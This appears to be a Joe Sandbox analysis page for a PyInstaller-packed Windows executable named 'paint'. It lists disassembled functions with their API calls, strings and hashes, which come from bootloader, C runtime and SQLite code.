Instruction ID: 2c4080e693f30776634ba9d2c2f66456547a75d61390a7110f310b8cb6a3c1ec
Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction Fuzzy Hash: 0F217132B08B8187E7549B26A5446AEB2A5FB88B94F584135EB8D43FA9CF3CD451CB04

Function 00007FF6F0BED66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF6F0BE0D00,?,?,?,00007FF6F0BE236A,?,?,?,?,?,00007FF6F0BE3B59), ref: 00007FF6F0BED6AA

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: d6683fa3ae1bdfc8c4d2a37fa4b6c07706ba87b9afd52ff45121e21a8bf76aef
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: A1F05804F09303B8FF6467A1590167812904F96BA0F880370DD3FCB3C6FEAEA4808210

Non-executed Functions

Function 00007FF6F0BD8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8C46

Part of subcall function 00007FF6F0BEA4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BEA500

Part of subcall function 00007FF6F0BE878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE87F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8CD6
CreateProcessW.KERNEL32 ref: 00007FF6F0BD8D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8D18

Part of subcall function 00007FF6F0BD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2C9E
Part of subcall function 00007FF6F0BD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2D63
Part of subcall function 00007FF6F0BD2C50: MessageBoxW.USER32 ref: 00007FF6F0BD2D99

RegisterClassW.USER32 ref: 00007FF6F0BD8D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8D7B
CreateWindowExW.USER32 ref: 00007FF6F0BD8DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8E05
PeekMessageW.USER32 ref: 00007FF6F0BD8E29
TranslateMessage.USER32 ref: 00007FF6F0BD8E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8E41
PeekMessageW.USER32 ref: 00007FF6F0BD8E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8FF4
GetExitCodeProcess.KERNEL32 ref: 00007FF6F0BD9009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD9012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD901F

Strings

Failed to create child process!, xrefs: 00007FF6F0BD8D20
PyInstallerOnefileHiddenWindow, xrefs: 00007FF6F0BD8D44
PyInstaller Onefile Hidden Window, xrefs: 00007FF6F0BD8D85
CreateProcessW, xrefs: 00007FF6F0BD8D27

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: a22e0a3c8163d40ef9c95ded053830d06f46bc37fcf410426d6ab20a6e838ce3
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: A0D1C232A09A82E6EB108F74E8506A97765FF86B59F800235DA6E837E4EF3DD104C700

Function 00007FFDFB124320 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 452COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB1248A4

Strings

mode, xrefs: 00007FFDFB12467E
invalid uri authority: %.*s, xrefs: 00007FFDFB1244A7
cach, xrefs: 00007FFDFB124820
%s mode not allowed: %s, xrefs: 00007FFDFB12485E
no such vfs: %s, xrefs: 00007FFDFB124954
file, xrefs: 00007FFDFB12439B
localhos, xrefs: 00007FFDFB12447E
cache, xrefs: 00007FFDFB12473B
no such %s mode: %s, xrefs: 00007FFDFB1247CE
mode, xrefs: 00007FFDFB124801
access, xrefs: 00007FFDFB124765
cach, xrefs: 00007FFDFB12468F

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
API String ID: 4225454184-1067337024
Opcode ID: f34923dd5e9eb12801e09e26d8048321a22b23a76132290968c844465b19779d
Instruction ID: 520b531f2b96d83629182c7cbd0a80ef5bc8f9936ae38898cfb44eeacd86426a
Opcode Fuzzy Hash: f34923dd5e9eb12801e09e26d8048321a22b23a76132290968c844465b19779d
Instruction Fuzzy Hash: 50020063F0E68345FF658B249070B792A91AB52B9CF184235CFBE476E9DE3DE4618700

Function 00007FFDFAA03028 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDFAA03044
00007FFE1A461A90.VCRUNTIME140 ref: 00007FFDFAA03068
RtlCaptureContext.KERNEL32 ref: 00007FFDFAA03071
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDFAA0308B
RtlVirtualUnwind.KERNEL32 ref: 00007FFDFAA030CC
00007FFE1A461A90.VCRUNTIME140 ref: 00007FFDFAA030FF
IsDebuggerPresent.KERNEL32 ref: 00007FFDFAA03120
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDFAA0313D
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDFAA03148

Memory Dump Source

Source File: 00000001.00000002.2013426793.00007FFDFAA01000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAA00000, based on PE: true

Associated: 00000001.00000002.2013391762.00007FFDFAA00000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAA62000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAAE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAB2000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAAB7000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB14000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013426793.00007FFDFAB17000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013772305.00007FFDFAB18000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2013801898.00007FFDFAB19000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaa00000_paint.jbxd

Similarity

API ID: 00007A461ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 2528831389-0
Opcode ID: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
Instruction ID: 653c062766fc53e6493072f518a89a06c6279ea6e2bde46ab17aefa2248b5286
Opcode Fuzzy Hash: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
Instruction Fuzzy Hash: 59316D72709B928AEBA48F60E8607ED3364FB84744F48803ADA5E47B99DF38C54DC710

Function 00007FF6F0BD83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD841B
RemoveDirectoryW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD849E
DeleteFileW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84BD
FindNextFileW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84CB
FindClose.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84DC
RemoveDirectoryW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84E5

Strings

%s\*, xrefs: 00007FF6F0BD83E2

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: 9a8a52e998d158609c3b3ae7c450f573cf65c3b4f330eb4458d2075b307f4148
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: BC41C225A0E943A0EB209B60E4545B9A365FF96B55FC00232D56FC37C4FF3EE5068B00

Function 00007FFDFB067336 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00007FFDFB06746B
-x0, xrefs: 00007FFDFB067606
VUUU, xrefs: 00007FFDFB06759B
0123456789ABCDEF0123456789abcdef, xrefs: 00007FFDFB067526

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID:
String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
API String ID: 0-2031831958
Opcode ID: aafa9c7c8745f6f681145794801f24959e5452036c02e7fc8f328c3f6a8f3bcc
Instruction ID: 6803ad33953f182e4d6431a67d93952a1262b9240ab031a5c0b0e912d273c627
Opcode Fuzzy Hash: aafa9c7c8745f6f681145794801f24959e5452036c02e7fc8f328c3f6a8f3bcc
Instruction Fuzzy Hash: 43D14622B1E6938ADB248B14D076F797BA6FB56784F454035DE6E037E9DE2CD400E700

Function 00007FF6F0BDD19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6F0BDD1B8
RtlCaptureContext.KERNEL32 ref: 00007FF6F0BDD1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6F0BDD1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF6F0BDD240
IsDebuggerPresent.KERNEL32 ref: 00007FF6F0BDD294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6F0BDD2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6F0BDD2BC

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: de53b9290878e02cf0887852d066492c2e9152245b0fbf26231cc6f60dc635df
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: 9B317E76609B81D6EB608FA0E8807EE7365FB85705F84403ADA5E87B94EF3DC648C710

Function 00007FF6F0BEA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6F0BEA6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6F0BEA715
RtlVirtualUnwind.KERNEL32 ref: 00007FF6F0BEA750
IsDebuggerPresent.KERNEL32 ref: 00007FF6F0BEA789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6F0BEA793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6F0BEA79E

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 10fd3377e37dac6840fb044f10ffcec09820b9b6a7ea783e8badb70e996898b2
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: E4319136608B8196DB20CF64E8406AE77A8FB89754F940135EAAE83B95EF3DD545CB00

Function 00007FF6F0BF18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF1930
FindFirstFileExW.KERNEL32 ref: 00007FF6F0BF1A3A

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction ID: 567ee392d49fde37cac01364b964fff3282d152b8466d7495051d4ecaa150321
Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction Fuzzy Hash: 54B1D52AB1868291EB61DBA1D4101B96398EB46BE5FC45931EE6F87BC5FF3DE441C300

Function 00007FFDFB07C380 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 377COMMON

Download Yara Rule

Strings

recovered %d frames from WAL file %s, xrefs: 00007FFDFB07C8D8
, xrefs: 00007FFDFB07C40F

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID:
String ID: $recovered %d frames from WAL file %s
API String ID: 0-3175670447
Opcode ID: 6c7431fa180725cc36759ec206d1da95856d3c8f4b63d4515f8f124b14de0cae
Instruction ID: 7ea52fb3fc1ca53ecab53994157858e4b46630ca3c152d0f1bd4987a3f777b7e
Opcode Fuzzy Hash: 6c7431fa180725cc36759ec206d1da95856d3c8f4b63d4515f8f124b14de0cae
Instruction Fuzzy Hash: 35F1C036B0978286E7609F25E050B6EB7A0F785B88F204035DE6D87BE8DF38D844DB40

Function 00007FFDFB0D632A Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd9289cba8bfa2c1e04b0f14acf51c89b125ee162225301f3ae995f4e4b14918
Instruction ID: e078a8d4c24fb004a41411f7e8ca2a7b565cf4dfdb54653bf675078c03ad829f
Opcode Fuzzy Hash: fd9289cba8bfa2c1e04b0f14acf51c89b125ee162225301f3ae995f4e4b14918
Instruction Fuzzy Hash: B8B0923F20D24884C301ABF14681A0C2E20E380E10F040051C3D102260E3AE441B8311

Function 00007FF6F0BD5820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5830
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5842
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5879
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD588B
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58A4
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58B6
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58CF
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58E1
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58FD
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD590F
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD592B
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD593D
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5959
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD596B
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5987
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5999
GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD59B5
GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD59C7

Strings

Py_ExitStatusException, xrefs: 00007FF6F0BD589A, 00007FF6F0BD58BC
PyConfig_SetWideStringList, xrefs: 00007FF6F0BD5A63, 00007FF6F0BD5A85
Py_IsInitialized, xrefs: 00007FF6F0BD5921, 00007FF6F0BD5943
GetProcAddress, xrefs: 00007FF6F0BD5858
PyMarshal_ReadObjectFromString, xrefs: 00007FF6F0BD5C5D, 00007FF6F0BD5C7F
PyRun_SimpleStringFlags, xrefs: 00007FF6F0BD5DFB, 00007FF6F0BD5E1D
PyConfig_SetString, xrefs: 00007FF6F0BD5A35, 00007FF6F0BD5A57
PyErr_Restore, xrefs: 00007FF6F0BD5B77, 00007FF6F0BD5B99
PyEval_EvalCode, xrefs: 00007FF6F0BD5BA5, 00007FF6F0BD5BC7
PySys_GetObject, xrefs: 00007FF6F0BD5E57, 00007FF6F0BD5E79
PyObject_CallFunction, xrefs: 00007FF6F0BD5CE7, 00007FF6F0BD5D09
PyUnicode_Decode, xrefs: 00007FF6F0BD5EE1, 00007FF6F0BD5F03
Py_DecRef, xrefs: 00007FF6F0BD5826, 00007FF6F0BD5848
PySys_SetObject, xrefs: 00007FF6F0BD5E85, 00007FF6F0BD5EA7
PyObject_SetAttrString, xrefs: 00007FF6F0BD5D71, 00007FF6F0BD5D93
Py_PreInitialize, xrefs: 00007FF6F0BD594F, 00007FF6F0BD5971
Py_DecodeLocale, xrefs: 00007FF6F0BD586F, 00007FF6F0BD5891
PyUnicode_FromFormat, xrefs: 00007FF6F0BD5F3D, 00007FF6F0BD5F5F
PyModule_GetDict, xrefs: 00007FF6F0BD5CB9, 00007FF6F0BD5CDB
PyConfig_InitIsolatedConfig, xrefs: 00007FF6F0BD59AB, 00007FF6F0BD59CD
PyMem_RawFree, xrefs: 00007FF6F0BD5C8B, 00007FF6F0BD5CAD
PyUnicode_Replace, xrefs: 00007FF6F0BD5FC7, 00007FF6F0BD5FE9
PyImport_AddModule, xrefs: 00007FF6F0BD5BD3, 00007FF6F0BD5BF5
PyUnicode_Join, xrefs: 00007FF6F0BD5F99, 00007FF6F0BD5FBB
PyConfig_Clear, xrefs: 00007FF6F0BD597D, 00007FF6F0BD599F
PyErr_Print, xrefs: 00007FF6F0BD5B49, 00007FF6F0BD5B6B
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6F0BD5DCD, 00007FF6F0BD5DEF
